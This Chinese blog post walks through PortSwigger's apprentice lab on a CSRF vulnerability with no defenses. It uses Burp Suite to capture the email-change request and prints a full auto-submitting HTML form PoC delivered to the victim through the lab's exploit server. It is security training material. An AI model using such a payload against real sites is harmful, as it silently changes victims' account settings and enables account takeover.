某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

    • 客户端

      • 跨站脚本(XSS)

      • 跨站请求伪造(CSRF)

        • 学徒-没有防御措施的CSRF漏洞
          • 题目
          • 实操
        • 从业者-CSRF-令牌验证取决于请求方法
        • 从业者-CSRF-令牌验证取决于令牌是否存在
        • 从业者-CSRF-令牌未绑定到用户会话
        • 从业者-CSRF-令牌绑定到非会话cookie
        • 从业者-CSRF-令牌仅在Cookie中复制
        • 从业者-SameSite Lax绕过-覆盖请求方法
        • 从业者-SameSite Strict绕过-客户端重定向
        • 从业者-SameSite Strict绕过-易受攻击的同级域
        • 从业者-SameSite Lax绕过-Cookie刷新
        • 从业者-CSRF-Referer验证取决于标头是否存在
        • 从业者-CSRF-Referer验证中断
      • 跨域资源共享(CORS)

      • 点击劫持

      • 基于DOM的漏洞

      • WebSockets

    • 高级主题

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 客户端
  • 跨站请求伪造(CSRF)
carsaid
2023-09-27
目录

学徒-没有防御措施的CSRF漏洞

# 实验室:没有防御措施的CSRF漏洞

# 题目

此实验室的 电子邮件更改功能 容易受到 CSRF 的攻击。

若要解决实验室问题,请制作一些 HTML 用于实现 CSRF 攻击,将载荷上传到你的漏洞利用服务器,更改查看者的电子邮件地址。

你可以使用以下凭据登录到自己的帐户:wiener:peter

提示

你不能注册已被其他用户占用的电子邮件地址。如果你在测试漏洞期间 更改了自己的电子邮件地址,请你确保——向受害者发送的最终漏洞利用中,应包含不同的电子邮件地址。

实验室-学徒

没有防御措施的CSRF漏洞 >>

- name: 实验室-学徒
  desc: 没有防御措施的CSRF漏洞 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/csrf/lab-no-defenses
  bgColor: '#001350'
  textColor: '#39d50c'
1
2
3
4
5
6

# 实操

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image

进入实验室,点击 “My account” 访问登录界面。

Not Found Image

输入题目中提供的用户名和密码进行登录。

Not Found Image

登录后,在账户页面中可以看到一个邮箱更改功能,输入一个新邮箱并点击 “Update email”。

Not Found Image

捕获刚刚 邮箱更改 的请求数据包,右键数据包并选择 “Engagement tools / Generate CSRF PoC” 以自动生成一个 CSRF 的 PoC。

Not Found Image

点击下方的 “Copy HTML” 复制生成的 PoC。

Not Found Image

进入漏洞利用服务器,将 PoC 替换到 “Body” 一栏中,点击 “Store” 保存。

注意,你的邮箱已经被更改为a@b.c,而 PoC 里的邮箱也是a@b.c。由于邮箱地址不能重复,所以将 PoC 里的邮箱修改为x@y.z,防止冲突。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<受攻击的域>/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="x&#64;y&#46;z" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
Not Found Image

保存 PoC 之后,你可以访问和测试它。

确认载荷无误之后,点击 “Deliver exploit to victim” 将其发送给受害用户。

Not Found Image

载荷正确,成功更改了受害用户的邮箱地址。

实验完成。

Not Found Image
编辑 (opens new window)
专家-客户端模板注入-反射型XSS-AngularJS沙箱逃逸与CSP的碰撞
从业者-CSRF-令牌验证取决于请求方法

← 专家-客户端模板注入-反射型XSS-AngularJS沙箱逃逸与CSP的碰撞 从业者-CSRF-令牌验证取决于请求方法→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式